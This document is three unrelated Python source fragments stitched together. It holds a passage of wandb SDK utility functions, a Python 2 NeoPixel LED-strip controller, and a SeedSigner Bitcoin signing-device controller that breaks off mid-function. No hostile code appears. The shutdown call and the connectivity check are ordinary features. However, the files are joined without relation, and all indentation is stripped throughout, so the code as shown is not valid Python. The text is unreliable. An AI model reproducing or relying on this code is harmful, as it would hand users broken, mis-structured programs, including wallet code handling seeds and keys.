root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
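# Sketch: in a checkout named "myrepo" with program "src/train.py", this
# yields "myrepo-src"; outside any git repo it yields "uncategorized".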
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None on success, or an error string on failure
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
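# Usage sketch: parse_sweep_id mutates the dict in place and returns an
# error string only on failure; the ids below are illustrative.
def _example_parse_sweep_id():
    parts = dict(entity=None, project=None, name="my-entity/my-proj/abc123")
    err = parse_sweep_id(parts)
    # parts == {"name": "abc123", "project": "my-proj", "entity": "my-entity"}
    return err, parts  # err is None on success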
def to_forward_slash_path(path: str) -> str:
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
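# Usage sketch: register a callback that fires the first time a module is
# imported through the hook; "pandas" is just an example target.
def _example_add_import_hook():
    def on_pandas_import():
        logger.info("pandas was imported")
    add_import_hook("pandas", on_pandas_import)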
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
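# Round-trip sketch for the id helpers; the base64 value below is the
# standard-alphabet, padded encoding of the bytes ab cd ef 12.
def _example_id_roundtrip():
    hex_id = b64_to_hex_id("q83vEg==")  # -> "abcdef12"
    return hex_to_b64_id(hex_id)        # -> "q83vEg=="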
def host_from_path(path):
"""returns the host of the path"""
url = urllib.parse.urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urllib.parse.urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
def is_unicode_safe(stream):
"""returns true if the stream supports UTF-8"""
if not hasattr(stream, "encoding"):
return False
return stream.encoding.lower() in {"utf-8", "utf_8"}
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
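# Usage sketch: write a file that is flushed and fsynced before the context
# exits, so the bytes survive a crash immediately after the write; the file
# name below is illustrative.
def _example_fsync_open():
    with fsync_open("durable.txt") as f:
        f.write("durable line\n")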
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
or "kaggle_environments" in sys.modules # noqa: W503
)
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
def sweep_config_err_text_from_jsonschema_violations(violations):
"""Consolidate violation strings from wandb/sweeps describing the ways in which a
sweep config violates the allowed schema as a single string.
Parameters
----------
violations: list of str
The warnings to render.
Returns
-------
violation: str
The consolidated violation text.
"""
violation_base = (
"Malformed sweep config detected! This may cause your sweep to behave in unexpected ways.\n"
"To avoid this, please fix the sweep config schema violations below:"
)
for i, warning in enumerate(violations):
violations[i] = " Violation {}. {}".format(i + 1, warning)
violation = "\n".join([violation_base] + violations)
return violation
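# Sketch of the consolidated message for two hypothetical violations; note
# the function also rewrites the passed-in list entries in place.
def _example_sweep_violation_text():
    return sweep_config_err_text_from_jsonschema_violations(
        ["'metric' is a required property", "'parameters' must be a dict"]
    )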
def handle_sweep_config_violations(warnings):
"""Render warnings from gorilla describing the ways in which a
sweep config violates the allowed schema as terminal warnings.
Parameters
----------
warnings: list of str
The warnings to render.
"""
warning = sweep_config_err_text_from_jsonschema_violations(warnings)
if len(warnings) > 0:
term.termwarn(warning)
def _log_thread_stacks():
"""Log all threads, useful for debugging."""
thread_map = dict((t.ident, t.name) for t in threading.enumerate())
for thread_id, frame in sys._current_frames().items():
logger.info(
"\n--- Stack for thread {t} {name} ---".format(
t=thread_id, name=thread_map.get(thread_id, "unknown")
)
)
for filename, lineno, name, line in traceback.extract_stack(frame):
logger.info(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
logger.info(" Line: %s" % line)
def check_windows_valid_filename(path):
return not bool(re.search(RE_WINFNAMES, path))
def artifact_to_json(artifact) -> Dict[str, Any]:
# public.Artifact has the _sequence name, instances of wandb.Artifact
# just have the name
if hasattr(artifact, "_sequence_name"):
sequence_name = artifact._sequence_name
else:
sequence_name = artifact.name.split(":")[0]
return {
"_type": "artifactVersion",
"_version": "v0",
"id": artifact.id,
"version": artifact.version,
"sequenceName": sequence_name,
"usedAs": artifact._use_as,
}
def check_dict_contains_nested_artifact(d, nested=False):
for _, item in six.iteritems(d):
if isinstance(item, dict):
contains_artifacts = check_dict_contains_nested_artifact(item, True)
if contains_artifacts:
return True
elif (
isinstance(item, wandb.Artifact)
or isinstance(item, wandb.apis.public.Artifact)
) and nested:
return True
return False
|
led_controller.py | from threading import Thread
from neopixel import *
from patterns import *
import math
import time  # used by process() when waiting for a pattern restart
class LedController:
def __init__(self, queue):
self.queue = queue
self.looper = Thread(target=self.process)
self.looper.daemon = True
self.pattern_runner = Thread(target=self.run_pattern)
self.pattern_runner.daemon = True
self.stats = {
'last_pattern': tricolor,
'active_pattern': tricolor,
'preferred_brightness': 80,
'preferred_color': Color(0, 255, 0),  # Red (channels passed in GRB order; see handle_color)
'pattern_running': True
}
self.strip = Adafruit_NeoPixel(145, 18)
self.strip.begin()
def run(self):
self.pattern_runner.start()
self.looper.start()
self.strip.setBrightness(self.stats['preferred_brightness'])
def process(self):
while True:
needs_restart = self.get_pattern(self.queue.get(True))
if needs_restart:
self.stats['pattern_running'] = False
while not self.stats['pattern_running']:
time.sleep(0.2)
def run_pattern(self):
while True:
self.stats['active_pattern'](self.strip, self.stats)
self.stats['pattern_running'] = True
def get_pattern(self, message):
return {
'power': self.handle_power,
'color': self.handle_color,
'brightness': self.handle_brightness,
'pattern': self.handle_pattern
}[message.topic](message.payload)
def handle_power(self, state):
print "handle_power payload: " + state
if "ON" == state:
self.strip.setBrightness(self.stats['preferred_brightness'])
self.stats['active_pattern'] = self.stats['last_pattern']
else:
self.stats['last_pattern'] = self.stats['active_pattern']
self.stats['active_pattern'] = no_pattern
return True
def handle_color(self, color_rgb):
r, g, b = color_rgb.split("_")
print "handle_color payload: RGB(" + r + "," + g + "," + b + ")"
self.stats['preferred_color'] = Color(int(g), int(r), int(b))
self.stats['active_pattern'] = static_lights
return True
def handle_pattern(self, pattern):
patterns = {
'static': static_lights,
'breathing': breathing,
'flag': tricolor,
'swipe': swipe,
'random swipe': random_swipe,
'rainbow': rainbow,
'rainbow cycle': rainbow_cycle,
'racing': theaterChase
}
print "handle_pattern payload:" + pattern
self.stats['last_pattern'] = self.stats['active_pattern']
self.stats['active_pattern'] = patterns.get(pattern, static_lights)
return True
def handle_brightness(self, brightness_percent):
print "handle_brightness payload: " + brightness_percent + "%"
brightness = int(math.floor(2.55 * float(brightness_percent) * 0.3))
self.stats['preferred_brightness'] = brightness
self.strip.setBrightness(brightness)
return False
def wipe(self):
for i in range(self.strip.numPixels()):
self.strip.setPixelColor(i, Color(0, 0, 0))
self.strip.show()
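# Usage sketch (illustrative only): LedController.process() expects
# paho-mqtt-style messages, i.e. objects exposing .topic and .payload.
# The queue and FakeMessage below are hypothetical stand-ins:
# from Queue import Queue
# from collections import namedtuple
# FakeMessage = namedtuple("FakeMessage", ["topic", "payload"])
# q = Queue()
# controller = LedController(q)
# controller.run()
# q.put(FakeMessage(topic="brightness", payload="50"))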
|
controller.py | # External Dependencies
import time
import re
from multiprocessing import Process, Queue
from subprocess import call
import os, sys
from embit import bip32, script, ec
from embit.networks import NETWORKS
from embit.descriptor import Descriptor
from binascii import hexlify
from threading import Thread
# Internal file class dependencies
from .views import (View, MenuView, SeedToolsView,SigningToolsView,
SettingsToolsView, IOTestView, OpeningSplashView, ScreensaverView)
from .helpers import Buttons, B, Path, Singleton
from .models import (EncodeQRDensity, QRType, Seed, SeedStorage, Settings, DecodeQR, DecodeQRStatus, EncodeQR, PSBTParser)
class Controller(Singleton):
"""
The Controller is a globally available singleton that maintains SeedSigner state.
It only makes sense to ever have a single Controller instance so it is
implemented here as a singleton. One departure from the typical singleton pattern
is the addition of a `configure_instance()` call to pass run-time settings into
the Controller.
Any code that needs to interact with the one and only Controller can just run:
```
from seedsigner.controller import Controller
controller = Controller.get_instance()
```
Note: In many/most cases you'll need to do the Controller import within a method
rather than at the top in order to avoid circular imports.
"""
VERSION = "0.4.5"
@classmethod
def get_instance(cls):
# This is the only way to access the one and only Controller
if cls._instance:
return cls._instance
else:
raise Exception("Must call Controller.configure_instance(config) first")
@classmethod
def configure_instance(cls, config=None):
# Must be called before the first get_instance() call
if cls._instance:
raise Exception("Instance already configured")
# Instantiate the one and only Controller instance
controller = cls.__new__(cls)
cls._instance = controller
# Input Buttons
controller.buttons = Buttons()
# models
controller.storage = SeedStorage()
Settings.configure_instance(config)
controller.settings = Settings.get_instance()
# settings
controller.DEBUG = controller.settings.debug
controller.color = controller.settings.text_color
controller.current_bg_qr_color = controller.settings.qr_background_color
# Views
controller.menu_view = MenuView()
controller.seed_tools_view = SeedToolsView()
controller.io_test_view = IOTestView()
controller.signing_tools_view = SigningToolsView(controller.storage)
controller.settings_tools_view = SettingsToolsView()
controller.screensaver = ScreensaverView(controller.buttons)
controller.screensaver_activation_ms = 120 * 1000
@property
def camera(self):
from .camera import Camera
return Camera.get_instance()
def start(self) -> None:
opening_splash = OpeningSplashView()
opening_splash.start()
if self.DEBUG:
# Let Exceptions halt execution
try:
self.show_main_menu()
finally:
# Clear the screen when exiting
self.menu_view.display_blank_screen()
else:
# Handle Unexpected crashes by restarting up to 3 times
crash_cnt = 0
while True:
try:
self.show_main_menu()
except Exception as error:
if crash_cnt >= 3:
break
else:
print('Caught this error: ' + repr(error)) # debug
self.menu_view.draw_modal(["Crashed ..."], "", "restarting")
time.sleep(5)
crash_cnt += 1
self.menu_view.draw_modal(["Crashed ..."], "", "requires hard restart")
def start_screensaver(self):
self.screensaver.start()
### Menu
### Menu View handles navigation within the menu
### Sub Menu's like Seed Tools, Signing Tools, Settings are all in the Menu View
def show_main_menu(self, sub_menu = 0):
ret_val = sub_menu
while True:
ret_val = self.menu_view.display_main_menu(ret_val)
if ret_val == Path.MAIN_MENU:
ret_val = Path.MAIN_MENU
elif ret_val == Path.GEN_LAST_WORD:
ret_val = self.show_generate_last_word_tool()
elif ret_val == Path.DICE_GEN_SEED:
ret_val = self.show_create_seed_with_dice_tool()
elif ret_val == Path.IMAGE_GEN_SEED:
ret_val = self.show_create_seed_with_image_tool()
elif ret_val == Path.SAVE_SEED:
ret_val = self.show_store_a_seed_tool()
elif ret_val == Path.PASSPHRASE_SEED:
ret_val = self.show_add_remove_passphrase_tool()
elif ret_val == Path.GEN_XPUB:
ret_val = self.show_generate_xpub()
elif ret_val == Path.SIGN_TRANSACTION:
ret_val = self.show_sign_transaction()
elif ret_val == Path.IO_TEST_TOOL:
ret_val = self.show_io_test_tool()
elif ret_val == Path.VERSION_INFO:
ret_val = self.show_version_info()
elif ret_val == Path.CURRENT_NETWORK:
ret_val = self.show_current_network_tool()
elif ret_val == Path.WALLET:
ret_val = self.show_wallet_tool()
elif ret_val == Path.QR_DENSITY_SETTING:
ret_val = self.show_qr_density_tool()
elif ret_val == Path.PERSISTENT_SETTINGS:
ret_val = self.show_persistent_settings_tool()
elif ret_val == Path.CAMERA_ROTATION:
ret_val = self.show_camera_rotation_tool()
elif ret_val == Path.DONATE:
ret_val = self.show_donate_tool()
elif ret_val == Path.RESET:
ret_val = self.show_reset_tool()
elif ret_val == Path.POWER_OFF:
ret_val = self.show_power_off()
raise Exception("Unhandled case")
### Power Off
def show_power_off(self):
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Power Off?")
if r == 1: #Yes
self.menu_view.display_power_off_screen()
call("sudo shutdown --poweroff now", shell=True)
time.sleep(10)
else: # No
return Path.MAIN_MENU
###
### Seed Tools Controller Navigation/Launcher
###
### Generate Last Word 12 / 24 Menu
def show_generate_last_word_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = 0
while True:
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_12_24_word_menu("... [ Return to Seed Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(11)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(23)
else:
return Path.SEED_TOOLS_SUB_MENU
if len(seed.mnemonic_list) > 0:
seed.mnemonic = self.seed_tools_view.display_last_word(seed.mnemonic_display_list)
break
# display seed phrase
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic, show_qr_option=True)
if ret_val == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Create a Seed w/ Dice Screen
def show_create_seed_with_dice_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = True
while True:
seed.mnemonic = self.seed_tools_view.display_generate_seed_from_dice()
if seed:
break
else:
return Path.SEED_TOOLS_SUB_MENU
# display seed phrase (24 words)
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=True)
if ret_val == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Create a Seed w/ Image
def show_create_seed_with_image_tool(self) -> int:
seed = Seed(wordlist=self.settings.wordlist)
ret_val = True
while True:
(reshoot, seed.mnemonic) = self.seed_tools_view.seed_phrase_from_camera_image()
if reshoot:
# Relaunch into another image capture cycle
continue
if seed:
break
else:
return Path.SEED_TOOLS_SUB_MENU
# display seed phrase (24 words)
while True:
ret_val = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=True)
if ret_val == True:
break
else:
# Start over
return self.show_create_seed_with_image_tool()
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Main Menu")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
### Store a seed (temp) Menu
def show_store_a_seed_tool(self):
seed = Seed(wordlist=self.settings.wordlist)
ret_val = 0
display_saved_seed = False
ret_val = self.menu_view.display_saved_seed_menu(self.storage, 1, "... [ Return to Seed Tools ]")
if ret_val == 0:
return Path.SEED_TOOLS_SUB_MENU
slot_num = ret_val
if self.storage.check_slot(slot_num) == True:
display_saved_seed = True
# show seed phrase
# display seed phrase (24 words)
while True:
r = self.seed_tools_view.display_seed_phrase(self.storage.get_seed_phrase(abs(slot_num)), self.storage.get_passphrase(abs(slot_num)), show_qr_option=True)
if r == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
return Path.SEED_TOOLS_SUB_MENU
else:
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Seed Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.SEED_TOOLS_SUB_MENU
if not seed:
# seed is not valid
return Path.SEED_TOOLS_SUB_MENU
if ret_val == Path.SEED_WORD_QR and seed:
show_qr_option = False
else:
show_qr_option = True
if not seed:
# Seed is not valid, Exit if not valid with message
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again", ""], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
else:
self.menu_view.draw_modal(["Valid Seed!"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
while display_saved_seed == False:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, show_qr_option=show_qr_option )
if r == True:
break
else:
# no-op; can't back out of the seed phrase view
pass
if seed:
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["", "Saved to Slot #" + str(slot_num)], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
### Add a PassPhrase Menu
def show_add_remove_passphrase_tool(self):
ret_val = 0
r = 0
if self.storage.num_of_saved_seeds() == 0:
self.menu_view.draw_modal(["Store a seed phrase", "prior to adding", "a passphrase"], "Error", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
if self.storage.num_of_saved_seeds() > 0:
if self.storage.num_of_saved_seeds() == 1:
ret_val = self.storage.get_first_seed_slot()
else:
ret_val = self.menu_view.display_saved_seed_menu(self.storage, 3, None)
if ret_val == 0:
return Path.SEED_TOOLS_SUB_MENU
# continue past the top-level if-block to capture and store the passphrase
slot_num = ret_val
if self.storage.check_slot_passphrase(slot_num) == True:
# only display menu to remove/update if there is a passphrase to remove
r = self.menu_view.display_generic_selection_menu(["... [ Return to Seed Tools ]", "Change Passphrase", "Remove Passphrase"], "Passphrase Action")
if r == 3:
# Remove Passphrase Workflow
self.storage.delete_passphrase(slot_num)
self.menu_view.draw_modal(["Passphrase Deleted", "from Slot #" + str(slot_num)], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
elif r == 1:
return Path.SEED_TOOLS_SUB_MENU
# continue if updating passphrase
# display a tool to pick letters/numbers to make a passphrase
passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry(existing_passphrase=self.storage.get_passphrase(slot_num))
if len(passphrase) == 0:
return Path.SEED_TOOLS_SUB_MENU
self.storage.save_passphrase(passphrase, slot_num)
if r in (0,1):
self.menu_view.draw_passphrase("Passphrase Added", passphrase, "Right to Continue")
elif r == 2:
self.menu_view.draw_passphrase("Passphrase Updated", passphrase, "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
return Path.SEED_TOOLS_SUB_MENU
###
### Signing Tools Navigation/Launcher
###
### Generate XPUB
def show_generate_xpub(self):
seed = Seed(wordlist=self.settings.wordlist)
# If there is a saved seed, ask to use saved seed
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Saved Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num not in (1,2,3):
return Path.SEED_TOOLS_SUB_MENU
seed = self.storage.get_seed(slot_num)
if not seed:
# no valid seed, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Sign Tools ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.SEED_TOOLS_SUB_MENU
if not seed:
return Path.SEED_TOOLS_SUB_MENU
# check if seed phrase is valid
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.SEED_TOOLS_SUB_MENU
# choose single sig or multisig wallet type
wallet_type = "multisig"
script_type = "native segwit"
derivation = self.settings.custom_derivation
r = self.menu_view.display_generic_selection_menu(["Single Sig", "Multisig"], "Wallet Type?")
if r == 1:
wallet_type = "single sig"
elif r == 2:
wallet_type = "multisig"
# choose derivation standard
r = self.menu_view.display_generic_selection_menu(["Native Segwit", "Nested Segwit", "Custom"], "Derivation Path?")
if r == 1:
script_type = "native segwit"
elif r == 2:
script_type = "nested segwit"
elif r == 3:
script_type = "custom"
# calculate the derivation, or get a custom one from keyboard entry
if script_type == "custom":
derivation = self.settings_tools_view.draw_derivation_keyboard_entry(existing_derivation=self.settings.custom_derivation)
self.settings.custom_derivation = derivation # save for next time
else:
derivation = Settings.calc_derivation(self.settings.network, wallet_type, script_type)
if derivation == "" or derivation == None:
self.menu_view.draw_modal(["Invalid Derivation", "try again"], "", "Right to Continue")
return Path.SEED_TOOLS_SUB_MENU
if self.settings.software == "Prompt":
lines = ["Specter Desktop", "Blue Wallet", "Sparrow"]
r = self.menu_view.display_generic_selection_menu(lines, "Which Wallet?")
qr_xpub_type = Settings.getXPubType(lines[r-1])
else:
qr_xpub_type = self.settings.qr_xpub_type
self.signing_tools_view.draw_modal(["Loading xPub Info ..."])
version = bip32.detect_version(derivation, default="xpub", network=NETWORKS[self.settings.network])
root = bip32.HDKey.from_seed(seed.seed, version=NETWORKS[self.settings.network]["xprv"])
fingerprint = hexlify(root.child(0).fingerprint).decode('utf-8')
xprv = root.derive(derivation)
xpub = xprv.to_public()
xpub_base58 = xpub.to_string(version=version)
self.signing_tools_view.display_xpub_info(fingerprint, derivation, xpub_base58)
self.buttons.wait_for([B.KEY_RIGHT])
self.signing_tools_view.draw_modal(["Generating xPub QR ..."])
e = EncodeQR(seed_phrase=seed.mnemonic_list, passphrase=seed.passphrase, derivation=derivation, network=self.settings.network, qr_type=qr_xpub_type, qr_density=self.settings.qr_density, wordlist=self.settings.wordlist)
while e.totalParts() > 1:
cur_time = int(time.time() * 1000)
if cur_time - self.buttons.last_input_time > self.screensaver_activation_ms and not self.screensaver.is_running:
self.start_screensaver()
self.buttons.update_last_input_time()
else:
image = e.nextPartImage(240,240,2,background=self.current_bg_qr_color)
View.DispShowImage(image)
time.sleep(0.1)
if self.buttons.check_for_low(B.KEY_RIGHT):
break
elif self.buttons.check_for_low(B.KEY_UP):
self.prev_qr_background_color()
elif self.buttons.check_for_low(B.KEY_DOWN):
self.next_qr_background_color()
while e.totalParts() == 1:
image = e.nextPartImage(240,240,1,background=self.current_bg_qr_color)
View.DispShowImage(image)
input = self.buttons.wait_for([B.KEY_RIGHT,B.KEY_UP,B.KEY_DOWN])
if input == B.KEY_RIGHT:
break
elif input == B.KEY_UP:
self.prev_qr_background_color()
elif input == B.KEY_DOWN:
self.next_qr_background_color()
return Path.MAIN_MENU
### Sign Transactions
def show_sign_transaction(self):
seed = Seed(wordlist=self.settings.wordlist)
used_saved_seed = False
# reusable qr scan function
def scan_qr(scan_text="Scan QR"):
# Scan QR using Camera
self.menu_view.draw_modal(["Initializing Camera"])
self.camera.start_video_stream_mode(resolution=(480, 480), framerate=12, format="rgb")
decoder = DecodeQR(wordlist=self.settings.wordlist)
def live_preview(camera, decoder, scan_text):
while True:
frame = self.camera.read_video_stream(as_image=True)
if frame is not None:
if decoder.getPercentComplete() > 0 and decoder.isPSBT():
scan_text = str(decoder.getPercentComplete()) + "% Complete"
View.DispShowImageWithText(frame.resize((240,240)), scan_text, font=View.ASSISTANT22, text_color=View.color, text_background=(0,0,0,225))
time.sleep(0.1) # turn this up or down to tune performance while decoding psbt
if camera._video_stream is None:
break
# putting live preview in its own thread to improve psbt decoding performance
t = Thread(target=live_preview, args=(self.camera, decoder, scan_text,))
t.start()
while True:
frame = self.camera.read_video_stream()
if frame is not None:
status = decoder.addImage(frame)
if status in (DecodeQRStatus.COMPLETE, DecodeQRStatus.INVALID):
self.camera.stop_video_stream_mode()
break
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
self.camera.stop_video_stream_mode()
break
time.sleep(0.2) # time to let live preview thread complete to avoid race condition on display
return decoder
# first QR scan
decoder = scan_qr()
if decoder.isComplete() and decoder.isPSBT():
# first QR is PSBT
self.menu_view.draw_modal(["Validating PSBT"])
psbt = decoder.getPSBT()
self.menu_view.draw_modal(["PSBT Valid!", "Enter", "seed phrase", "to sign this tx"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
elif decoder.isComplete() and decoder.isSeed():
# first QR is Seed
self.menu_view.draw_modal(["Validating Seed"])
seed.mnemonic = decoder.getSeedPhrase()
if not seed:
# seed is not valid, Exit if not valid with message
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again", ""], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Valid Seed!"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words"], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# Ask to save seed
if self.storage.slot_avaliable():
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
